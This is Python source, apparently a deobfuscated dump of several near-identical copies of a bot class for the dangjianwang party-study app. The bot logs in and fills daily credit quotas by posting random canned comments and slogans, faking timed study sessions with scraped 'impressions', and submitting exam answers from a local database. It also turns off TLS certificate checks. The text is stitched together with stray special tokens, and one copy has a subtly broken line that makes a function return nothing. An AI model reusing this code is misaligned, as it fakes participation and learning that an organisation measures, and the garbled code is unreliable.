excuteTimes.update({'study': examExcuteTimes})
return excuteTimes
def getToken(self):
"""
获得一个连接的token
每个连接都需要使用到
:return:
"""
data = {'appid': self.appid, 'username': self.username, 'password':
self.password}
longinurl = 'https://mapi.dangjianwang.com/v3_1/login'
r = self.session.post(url=longinurl, data=data, verify=False)
rjson = r.json()
if rjson['code'] == '200':
return rjson['token']
else:
print('token 获得失败')
return None
def getRJson(self, url):
data = {'token': self.token, 'appid': self.appid}
return self.session.post(url=url, data=data, verify=False).json()
def getUserInfo(self):
"""
获得一大串用户的信息,暂时没用
:return:
"""
infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'
return self.getRJson(url=infoUrl)
def getCredItinfoToday(self):
"""
获得人员当前的得分等级参数
:return:
"""
creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
info = self.getRJson(url=creditInfourl)
fullScore = info['data']['full']
gainScore = info['data']['gain']
currentLevel = info['data']['level']
username = info['data']['name']
ret = {'fullScore': fullScore, 'gainScore': gainScore,
'currentLevel': currentLevel, 'username': username}
return ret
def getCredItinfo(self):
"""
获得用户的今日积分状态
可用来判断是否需要再继续流程
数据如下
('35', [('连续登录', '3/3'), ('手机端登录', '2/2'), ('信息评论', '10/10'), ('党员视角发布', '4/4'), ('互助广场回答', '2/2'), ('学习资料写体会', '5/5'), ('在线阅读学习资料', '5/5'), ('在线知识竞答', '4/4')])
:return:(haved_credit, credit_detail)
"""
creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
haved_credit = 0
credit_detail = {}
info = self.getRJson(url=creditInfourl)
for k, v in info.items():
if k == 'data':
for k2, v2 in v.items():
if k2 == 'haved_credit':
haved_credit = v2
if k2 == 'credit_detail':
for i in v2:
credit_detail.update({i['title']: i['score']})
return haved_credit, credit_detail
def getPages(self, urls):
pages = []
for url in urls:
data = self.getRJson(url=url)
for k, v in data.items():
if k == 'data':
for i in v:
pages.append((i['title'], i['id']))
return pages
def getPagesII(self, urls):
def getRJson(url):
data = {'token': self.token, 'appid': self.appid, 'type_id':
'791', 'page_index': '1'}
return self.session.post(url=url, data=data, verify=False).json()
pages = []
for url in urls:
data = getRJson(url=url)
for k, v in data.items():
if k == 'data':
for i in v:
pages.append((i['name'], i['id']))
return pages
def doThumb(self, id):
"""
点赞函数,操作与id对应的页面
每次记录对应的信息到文件
:return:
"""
contents = ['关注', '关注!', '关注!!']
data = {'id': id, 'comment': random.choice(contents), 'token': self
.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
print(rjson)
if rjson['code'] == '1003':
self.token = self.getToken()
elif rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.thumbedPages.append(id)
for i in list(set(self.thumbPageList)):
if id == i[1]:
temp = {'title': i[0]}
self.thumbResults.update(temp)
log = '信息点赞:\n主题: {}\n提交:{}'.format(i[0], data[
'comment'])
detail = '{} 主题:{}\n回复:{}\n'.format(self.
getCurrentTime(), i[0], data['comment'])
write2File(self, './results/', 'result.txt', log)
thumbInfo = {'title': i[0], 'reply': data['comment']}
self.thumbPages.remove(id)
self.writeThumb2File(id=id)
return detail, thumbInfo
elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':
print('因评论过快,等待一段时间')
time.sleep(20)
else:
print('rjson', rjson)
self.thumbedPages.remove(id)
self.writeThumb2File(id=id)
log = '点赞:{}'.format(rjson)
self.writeLog2File(log)
print(log)
time.sleep(10)
def doHelp(self, id, callback=None):
"""
互助功能
:param id:
:return:
"""
detail = ''
helpInfo = None
log = ''
content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', '发展史第一要务,人才是第一资源,创新是第一动力。',
'要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']
data = {'id': id, 'content': random.choice(content), 'token': self.
token, 'appid': self.appid}
print(data)
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.helpedPages.append(id)
self.helpPages.remove(id)
for i in self.helpPageList:
if id == i[1]:
curTime = self.getCurrentTime()
self.helpResults.update({'title': id[0]})
log = '互助:\n主题: {}\n提交内容: {}'.format(i[0], rjson[
'comment'])
write2File(self, './results/', 'result.txt', log)
detail = '{} 主题: {}\n提交内容: {}\n'.format(curTime, i[
0], rjson['comment'].strip())
helpInfo = {'title': i[0], 'reply': rjson['comment']}
else:
pass
else:
pass
log = '帮助:{}'.format(rjson)
self.writeLog2File(log)
print(log)
return detail, log, helpInfo
def doView(self):
"""
党员视角发布功能
:return:
"""
content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']
data = {'content': random.choice(content), 'token': self.token,
'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.viewsResults.append(1)
else:
pass
log = '党员视角:{}'.format(rjson)
detail = '{} 党员视角:\n发布内容:{}\n'.format(self.getCurrentTime(), rjson[
'data']['content'])
publicContent = rjson['data']['content']
return detail, publicContent
def doStudy(self, mid):
"""
前三个post函数的响应的三个请求
get用来获得填写的内容
最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。
:param mid:
:return:
"""
interval = 60 * 5 + 5
def post1():
data = {'mid': mid, 'token': self.token, 'appid': self.appid}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post1:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def post2():
data = {'token': self.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post2:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def post3():
data = {'mid': mid, 'token': self.token, 'appid': self.appid}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post3:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def get1():
url = (
'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'
.format(self.token, mid))
rjson = self.session.get(url=url)
text = rjson.content
soup = BeautifulSoup(text, 'html.parser')
retContents = []
for div in soup.find_all('p'):
p = div.text.strip()
retContents.append(p if 100 > len(p) < 200 else p[0:200])
return random.choice(retContents)
def recordFeeling(content=None):
if not content:
content = (
'伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'
)
data = {'mid': mid, 'token': self.token, 'appid': self.appid,
'content': content}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习recordFeeling:{}'.format(rjson)
self.writeLog2File(log)
print('in recordFeeling')
print(log)
if rjson['code'] == '200':
return {'content': content}
elif rjson['code'] == '1120':
addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',
'人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',
'民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']
return recordFeeling(content='{}\n{}'.format(content,
random.choice(addtion)))
else:
return None
def readTime():
data = {'mid': mid, 'token': self.token, 'appid': self.appid,
'time': interval}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习readTime:{}'.format(rjson)
self.writeLog2File(log)
print(log)
post1()
time.sleep(1)
post2()
time.sleep(1)
post3()
time.sleep(1)
content = get1()
time.sleep(1)
count = 0
print('开始学习请稍后')
for i in range(interval):
count += 1
if count % 30 == 0:
print('已用时{}秒'.format(count))
time.sleep(1)
print('填写的学习体会', content)
self.studyRsults.update(recordFeeling(content=content))
time.sleep(1)
readTime()
time.sleep(1)
pass
    def doExam(self):
        """Take one random online exam and hand it in.

        Flow: POST the exam list (response is immediately overwritten —
        presumably a warm-up request; TODO confirm), list the question
        banks (recording all bank names and the 19th-congress bank's
        details), request a random paper from the hard-coded bank '6',
        look each question up in the local Django ``Qa`` table by
        substring match, then submit all answers to ``exam/handpaper``.

        Side effects: appends to self.examlist, self.examC19Info and
        self.qaList; prints progress separators and the final response.
        """
        ids = []
        data = {'page': '1', 'page_size': '20', 'token': self.token,
            'appid': self.appid}
        examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'
        # NOTE(review): this response is discarded (rjson is reassigned
        # below) — looks like a warm-up/bookkeeping call; confirm.
        rjson = self.session.post(url=examlistUrl, data=data, verify=False
            ).json()
        time.sleep(0.3)
        print('*' * 99)
        data = {'page': '1', 'page_size': '20', 'token': self.token,
            'appid': self.appid}
        banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'
        rjson = self.session.post(url=banklistUrl, data=data, verify=False
            ).json()
        for i in rjson['data']:
            tem = i['bank_name'], i['id']
            self.examlist.append(tem)
            if i['bank_name'] == '十九大报告100题(单选)':
                temp = {'title': i['bank_name'], 'detail': i['detail'],
                    'id': i['id']}
                self.examC19Info.append(temp)
        time.sleep(0.3)
        print('*' * 99)
        # Request a random paper; bank '6' is hard-coded — TODO confirm
        # which question bank this id refers to.
        data = {'bank': '6', 'token': self.token, 'appid': self.appid}
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
        rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
            )
        aa = rjson['data']
        paper = aa['id']
        for i in aa['questions']:
            temp = {'id': i['id'], 'content': i['content']}
            ids.append(temp)
        print('*' * 99)
        time.sleep(0.5)
        answers = []
        for i in ids:
            # Substring lookup in the local answer table; raises
            # IndexError if a question is not found — no fallback here.
            correctAnswer = Qa.objects.filter(question__contains=i['content'])[
                0]
            answerText = correctAnswer.answerText
            answer = correctAnswer.answer
            temp = {'index': i['id'], 'answer': answer}
            qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}
            self.qaList.append(qa)
            print(qa, i['content'])
            answers.append(temp)
            time.sleep(1)
        hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,
            'answers': json.dumps(answers)}
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'
        rjson = self.session.post(url=commitUrl, data=hdata, verify=False
            ).json()
        print(rjson)
        print(self.examlist)
        print(self.examC19Info)
        print(self.qaList)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Runner:
    """Automation client for the mapi.dangjianwang.com mobile API.

    Logs in on construction, pre-fetches page-id lists, then exposes
    methods that earn daily credit points: canned comments ("thumb"),
    help replies, viewpoint posts, timed study sessions and exams.

    NOTE(review): this file contains several near-identical copies of
    this class from a deobfuscated dump; this copy still contains a
    placeholder token line where a method (apparently getCurrentTime,
    which doThumb calls) used to be.
    """
    def __init__(self, appid='TJZHDJ01', username='', password=''):
        # Logs in immediately (getToken) and pre-fetches the page-id
        # lists used by doThumb / doHelp / doStudy.
        urllib3.disable_warnings()
        self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')
        self.username = username
        self.password = password
        # NOTE(review): '.format(username)' has no '{}' placeholder, so
        # username is ignored and every user shares these directories.
        self.thumbedFilePath = './lib/'.format(username)
        self.logFilePath = './log/'.format(username)
        self.errFilePath = './err/'.format(username)
        self.thumbedFileList = []
        self.debug = True
        self.session = requests.session()
        self.appid = appid
        self.headers = {'User-Agent':
            'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'
            , 'header_version': '80', 'system': 'android', 'Connection':
            'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}
        self.token = self.getToken()
        time.sleep(0.1)
        # (title, id) tuples of pages eligible for comments.
        self.thumbPageList = self.getPages(urls=[
            'https://mapi.dangjianwang.com/v3_1/Learn/List',
            'https://mapi.dangjianwang.com/v3_1/Activities/List',
            'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])
        self.thumbPages = [i[1] for i in self.thumbPageList]
        time.sleep(0.1)
        self.helpPageList = self.getPages(urls=[
            'https://mapi.dangjianwang.com/v3_1/Help/List'])
        self.helpPages = [i[1] for i in self.helpPageList]
        self.helpResults = {}
        time.sleep(0.1)
        self.studyPageList = self.getPagesII(urls=[
            'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])
        self.studyPages = [i[1] for i in self.studyPageList]
        time.sleep(0.1)
        self.studyRsults = {}
        self.thumbedPages = []
        self.thumbResults = {}
        self.helpedPages = []
        self.multiThumbed = []
        self.viewsResults = []
        self.examC19Info = []
        self.examlist = []
        self.qaList = []
    <|reserved_special_token_0|>
    def writeErr2File(self, err):
        """Append *err* with a timestamp to this user's error file.

        NOTE(review): writes under self.logFilePath, not
        self.errFilePath — possibly unintended.
        """
        path = self.logFilePath
        fullPath = '{}{}err.txt'.format(path, self.username)
        if not os.path.exists(path):
            os.mkdir(path)
        with open(fullPath, 'a') as f:
            f.write('{}:{}\n'.format(self.currentTime, err))
        print('err已经写入{}'.format(fullPath))
    def writeLog2File(self, log):
        """Append *log* with a timestamp to this user's log file."""
        path = self.logFilePath
        fullPath = '{}{}logs.txt'.format(path, self.username)
        if not os.path.exists(path):
            os.mkdir(path)
        with open(fullPath, 'a') as f:
            f.write('{}:{}\n'.format(self.currentTime, log))
        print('log已经写入{}'.format(fullPath))
    def writeThumb2File(self, id):
        """Append a commented page *id* to the per-user record file."""
        path = self.thumbedFilePath
        fullPath = '{}{}thumbs.txt'.format(path, self.username)
        if not os.path.exists(path):
            os.mkdir(path)
        with open(fullPath, 'a') as f:
            f.write(',{}'.format(id))
        print('点赞记录已经写入{}'.format(fullPath))
    def getThumbFromFile(self):
        """Return the list of already-recorded ids from disk.

        Also rewrites the file deduplicated and sorted.
        NOTE(review): when the file does not exist this returns the
        *path string* instead of a list — inconsistent return type.
        """
        path = self.thumbedFilePath
        inFileList = []
        fullPath = '{}{}thumbs.txt'.format(path, self.username)
        if not os.path.exists(fullPath):
            return fullPath
        with open(fullPath, 'r') as f:
            inFileList.extend(list(set(f.readlines()[0].split(','))))
        with open(fullPath, 'w') as f1:
            f1.write(','.join(sorted(inFileList)))
        return inFileList
    def getExcuteTimes(self):
        """Return a dict of how many times each automated action
        (thumb/help/view/exam/study) still needs to run today, derived
        from the 'gained/quota' strings in getCredItinfo()."""
        excuteTimes = {}
        credInfo = self.getCredItinfo()
        print(credInfo)
        currentScore = credInfo[0]
        thumbScore = credInfo[1]['信息评论'].split('/')[0]
        thumbExcuteTimes = 10 - int(thumbScore)
        excuteTimes.update({'thumb': thumbExcuteTimes})
        helpScore = credInfo[1]['互助广场回答'].split('/')[0]
        helpExctuteTimes = 2 - int(helpScore)
        excuteTimes.update({'help': helpExctuteTimes})
        viewScore = credInfo[1]['党员视角发布'].split('/')[0]
        viewExcuteTimes = int((4 - int(viewScore)) / 2)
        excuteTimes.update({'view': viewExcuteTimes})
        examScore = credInfo[1]['在线知识竞答'].split('/')[0]
        examExcuteTimes = int((4 - int(examScore)) / 2)
        excuteTimes.update({'exam': examExcuteTimes})
        # 'study' runs once if either the reading or the write-up quota
        # is unmet (examExcuteTimes is reused here as a scratch var).
        flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]
            ['在线阅读学习资料'].split('/')[0])
        flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]
            ['学习资料写体会'].split('/')[0])
        examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0
        excuteTimes.update({'study': examExcuteTimes})
        return excuteTimes
    def getToken(self):
        """Log in and return the session token, or None on failure.

        Every other request includes this token.
        """
        data = {'appid': self.appid, 'username': self.username, 'password':
            self.password}
        longinurl = 'https://mapi.dangjianwang.com/v3_1/login'
        r = self.session.post(url=longinurl, data=data, verify=False)
        rjson = r.json()
        if rjson['code'] == '200':
            return rjson['token']
        else:
            print('token 获得失败')
            return None
    def getRJson(self, url):
        """POST the standard token/appid form to *url*; return JSON."""
        data = {'token': self.token, 'appid': self.appid}
        return self.session.post(url=url, data=data, verify=False).json()
    def getUserInfo(self):
        """Fetch the raw user-info payload (currently unused)."""
        infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'
        return self.getRJson(url=infoUrl)
    def getCredItinfoToday(self):
        """Return today's score/level summary for the current user."""
        creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
        info = self.getRJson(url=creditInfourl)
        fullScore = info['data']['full']
        gainScore = info['data']['gain']
        currentLevel = info['data']['level']
        username = info['data']['name']
        ret = {'fullScore': fullScore, 'gainScore': gainScore,
            'currentLevel': currentLevel, 'username': username}
        return ret
    def getCredItinfo(self):
        """Return (haved_credit, credit_detail) for today.

        credit_detail maps item title -> 'gained/quota' score string,
        e.g. ('35', {'信息评论': '10/10', ...}); used to decide whether
        more automated actions are needed today.
        """
        creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
        haved_credit = 0
        credit_detail = {}
        info = self.getRJson(url=creditInfourl)
        for k, v in info.items():
            if k == 'data':
                for k2, v2 in v.items():
                    if k2 == 'haved_credit':
                        haved_credit = v2
                    if k2 == 'credit_detail':
                        for i in v2:
                            credit_detail.update({i['title']: i['score']})
        return haved_credit, credit_detail
    def getPages(self, urls):
        """Return (title, id) tuples from each listing endpoint."""
        pages = []
        for url in urls:
            data = self.getRJson(url=url)
            for k, v in data.items():
                if k == 'data':
                    for i in v:
                        pages.append((i['title'], i['id']))
        return pages
    def getPagesII(self, urls):
        """Return (name, id) tuples from the study-material listing.

        Uses a fixed type_id/page_index form (shadows getRJson with a
        local helper) instead of the standard token/appid-only form.
        """
        def getRJson(url):
            data = {'token': self.token, 'appid': self.appid, 'type_id':
                '791', 'page_index': '1'}
            return self.session.post(url=url, data=data, verify=False).json()
        pages = []
        for url in urls:
            data = getRJson(url=url)
            for k, v in data.items():
                if k == 'data':
                    for i in v:
                        pages.append((i['title'], i['id'])) if False else None
        return pages
    def doThumb(self, id):
        """Post a canned comment on page *id* and record the result.

        Response handling: '1003' -> refresh token; '200' + 成功 ->
        log, persist to file, return (detail, thumbInfo); '500' rate
        limit -> sleep 20s; anything else -> record and move on.
        Returns None on all non-success paths.
        """
        contents = ['关注', '关注!', '关注!!']
        data = {'id': id, 'comment': random.choice(contents), 'token': self
            .token, 'appid': self.appid}
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'
        rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
            )
        print(rjson)
        if rjson['code'] == '1003':
            self.token = self.getToken()
        elif rjson['code'] == '200':
            result = rjson['msg']
            if result == '操作成功':
                self.thumbedPages.append(id)
                for i in list(set(self.thumbPageList)):
                    if id == i[1]:
                        temp = {'title': i[0]}
                        self.thumbResults.update(temp)
                        log = '信息点赞:\n主题: {}\n提交:{}'.format(i[0], data[
                            'comment'])
                        # NOTE(review): this copy of the class has no
                        # getCurrentTime (placeholder above) — this call
                        # would fail at runtime; confirm.
                        detail = '{} 主题:{}\n回复:{}\n'.format(self.
                            getCurrentTime(), i[0], data['comment'])
                        write2File(self, './results/', 'result.txt', log)
                        thumbInfo = {'title': i[0], 'reply': data['comment']}
                        self.thumbPages.remove(id)
                        self.writeThumb2File(id=id)
                        return detail, thumbInfo
        elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':
            print('因评论过快,等待一段时间')
            time.sleep(20)
        else:
            print('rjson', rjson)
            # NOTE(review): id was never appended on this path, so
            # remove() may raise ValueError — confirm intent.
            self.thumbedPages.remove(id)
            self.writeThumb2File(id=id)
        log = '点赞:{}'.format(rjson)
        self.writeLog2File(log)
        print(log)
        time.sleep(10)
    def doHelp(self, id, callback=None):
        """Post a canned reply to help question *id*.

        Returns (detail, log, helpInfo); helpInfo stays None unless the
        reply succeeded. NOTE(review): on success this reads
        rjson['comment'] and id[0] — verify the key exists; 'i[0]' was
        probably intended instead of 'id[0]'. The inner 'else' is a
        for-else (runs when the loop completes without break).
        """
        detail = ''
        helpInfo = None
        log = ''
        content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', '发展史第一要务,人才是第一资源,创新是第一动力。',
            '要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']
        data = {'id': id, 'content': random.choice(content), 'token': self.
            token, 'appid': self.appid}
        print(data)
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'
        rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
            )
        if rjson['code'] == '200':
            result = rjson['msg']
            if result == '操作成功':
                self.helpedPages.append(id)
                self.helpPages.remove(id)
                for i in self.helpPageList:
                    if id == i[1]:
                        curTime = self.getCurrentTime()
                        self.helpResults.update({'title': id[0]})
                        log = '互助:\n主题: {}\n提交内容: {}'.format(i[0], rjson[
                            'comment'])
                        write2File(self, './results/', 'result.txt', log)
                        detail = '{} 主题: {}\n提交内容: {}\n'.format(curTime, i[
                            0], rjson['comment'].strip())
                        helpInfo = {'title': i[0], 'reply': rjson['comment']}
                else:
                    pass
        else:
            pass
        log = '帮助:{}'.format(rjson)
        self.writeLog2File(log)
        print(log)
        return detail, log, helpInfo
    def doView(self):
        """Publish a canned "party member viewpoint" post.

        Returns (detail, publicContent).
        NOTE(review): rjson['data']['content'] is read even when the
        code is not '200' — may raise KeyError on failure responses.
        """
        content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']
        data = {'content': random.choice(content), 'token': self.token,
            'appid': self.appid}
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'
        rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
            )
        if rjson['code'] == '200':
            result = rjson['msg']
            if result == '操作成功':
                self.viewsResults.append(1)
            else:
                pass
        log = '党员视角:{}'.format(rjson)
        detail = '{} 党员视角:\n发布内容:{}\n'.format(self.getCurrentTime(), rjson[
            'data']['content'])
        publicContent = rjson['data']['content']
        return detail, publicContent
    def doStudy(self, mid):
        """Run one timed study session for material *mid*.

        post1/post2/post3 mirror the app's bookkeeping requests; get1
        scrapes a paragraph from the material page to use as the
        "study impression"; after waiting ~5 minutes, recordFeeling
        submits the text and readTime reports the elapsed time — a
        successful readTime means the session counted.
        """
        interval = 60 * 5 + 5
        def post1():
            # Collection-status check for this material.
            data = {'mid': mid, 'token': self.token, 'appid': self.appid}
            commitUrl = (
                'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')
            rjson = self.session.post(url=commitUrl, data=data, verify=False
                ).json()
            log = '学习post1:{}'.format(rjson)
            self.writeLog2File(log)
            print(log)
        def post2():
            # Token validity check.
            data = {'token': self.token, 'appid': self.appid}
            commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'
            rjson = self.session.post(url=commitUrl, data=data, verify=False
                ).json()
            log = '学习post2:{}'.format(rjson)
            self.writeLog2File(log)
            print(log)
        def post3():
            # Fetch the impression count for this material.
            data = {'mid': mid, 'token': self.token, 'appid': self.appid}
            commitUrl = (
                'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')
            rjson = self.session.post(url=commitUrl, data=data, verify=False
                ).json()
            log = '学习post3:{}'.format(rjson)
            self.writeLog2File(log)
            print(log)
        def get1():
            # Scrape candidate paragraphs from the material page.
            url = (
                'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'
                .format(self.token, mid))
            rjson = self.session.get(url=url)
            text = rjson.content
            soup = BeautifulSoup(text, 'html.parser')
            retContents = []
            for div in soup.find_all('p'):
                p = div.text.strip()
                # NOTE(review): '100 > len(p) < 200' means len(p) < 100;
                # the 200 bound is redundant — confirm intended filter.
                retContents.append(p if 100 > len(p) < 200 else p[0:200])
            return random.choice(retContents)
        def recordFeeling(content=None):
            # Submit the study impression; on code '1120' (apparently a
            # duplicate-content rejection) retry with an extra random
            # sentence appended. Returns {'content': ...} or None.
            if not content:
                content = (
                    '伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'
                    )
            data = {'mid': mid, 'token': self.token, 'appid': self.appid,
                'content': content}
            commitUrl = (
                'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')
            rjson = self.session.post(url=commitUrl, data=data, verify=False
                ).json()
            log = '学习recordFeeling:{}'.format(rjson)
            self.writeLog2File(log)
            print('in recordFeeling')
            print(log)
            if rjson['code'] == '200':
                return {'content': content}
            elif rjson['code'] == '1120':
                addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',
                    '人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',
                    '民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']
                return recordFeeling(content='{}\n{}'.format(content,
                    random.choice(addtion)))
            else:
                return None
        def readTime():
            # Report the elapsed reading time to close the session.
            data = {'mid': mid, 'token': self.token, 'appid': self.appid,
                'time': interval}
            commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'
            rjson = self.session.post(url=commitUrl, data=data, verify=False
                ).json()
            log = '学习readTime:{}'.format(rjson)
            self.writeLog2File(log)
            print(log)
        post1()
        time.sleep(1)
        post2()
        time.sleep(1)
        post3()
        time.sleep(1)
        content = get1()
        time.sleep(1)
        count = 0
        print('开始学习请稍后')
        # Wait out the required reading time, one second per tick.
        for i in range(interval):
            count += 1
            if count % 30 == 0:
                print('已用时{}秒'.format(count))
            time.sleep(1)
        print('填写的学习体会', content)
        # NOTE(review): recordFeeling may return None, which would make
        # this update() raise TypeError — confirm.
        self.studyRsults.update(recordFeeling(content=content))
        time.sleep(1)
        readTime()
        time.sleep(1)
        pass
    def doExam(self):
        """Take one random exam from hard-coded bank '6', answer via
        the local Qa table (substring match), and hand the paper in.

        The first examlist response is discarded (rjson reassigned) —
        presumably a warm-up request; TODO confirm.
        """
        ids = []
        data = {'page': '1', 'page_size': '20', 'token': self.token,
            'appid': self.appid}
        examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'
        rjson = self.session.post(url=examlistUrl, data=data, verify=False
            ).json()
        time.sleep(0.3)
        print('*' * 99)
        data = {'page': '1', 'page_size': '20', 'token': self.token,
            'appid': self.appid}
        banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'
        rjson = self.session.post(url=banklistUrl, data=data, verify=False
            ).json()
        for i in rjson['data']:
            tem = i['bank_name'], i['id']
            self.examlist.append(tem)
            if i['bank_name'] == '十九大报告100题(单选)':
                temp = {'title': i['bank_name'], 'detail': i['detail'],
                    'id': i['id']}
                self.examC19Info.append(temp)
        time.sleep(0.3)
        print('*' * 99)
        data = {'bank': '6', 'token': self.token, 'appid': self.appid}
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
        rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
            )
        aa = rjson['data']
        paper = aa['id']
        for i in aa['questions']:
            temp = {'id': i['id'], 'content': i['content']}
            ids.append(temp)
        print('*' * 99)
        time.sleep(0.5)
        answers = []
        for i in ids:
            correctAnswer = Qa.objects.filter(question__contains=i['content'])[
                0]
            answerText = correctAnswer.answerText
            answer = correctAnswer.answer
            temp = {'index': i['id'], 'answer': answer}
            qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}
            self.qaList.append(qa)
            print(qa, i['content'])
            answers.append(temp)
            time.sleep(1)
        hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,
            'answers': json.dumps(answers)}
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'
        rjson = self.session.post(url=commitUrl, data=hdata, verify=False
            ).json()
        print(rjson)
        print(self.examlist)
        print(self.examC19Info)
        print(self.qaList)
    def getAnswerInfo(self):
        """Fetch answer results / accuracy (debug helper; just prints).

        NOTE(review): sends the literal string 'page_index' as the
        page_index value to the randexam endpoint — looks wrong.
        """
        data = {'token': self.token, 'appid': self.appid, 'page_size': '20',
            'page_index': 'page_index'}
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
        rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
            )
        print(rjson)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Runner:
    """Automation client for the mapi.dangjianwang.com mobile API.

    Logs in on construction, pre-fetches page-id lists, then exposes
    methods that earn daily credit points: canned comments ("thumb"),
    help replies, viewpoint posts, timed study sessions and exams.

    NOTE(review): this is one of several near-identical copies of this
    class left in the file by a deobfuscation dump.
    """
    def __init__(self, appid='TJZHDJ01', username='', password=''):
        # Logs in immediately (getToken) and pre-fetches the page-id
        # lists used by doThumb / doHelp / doStudy.
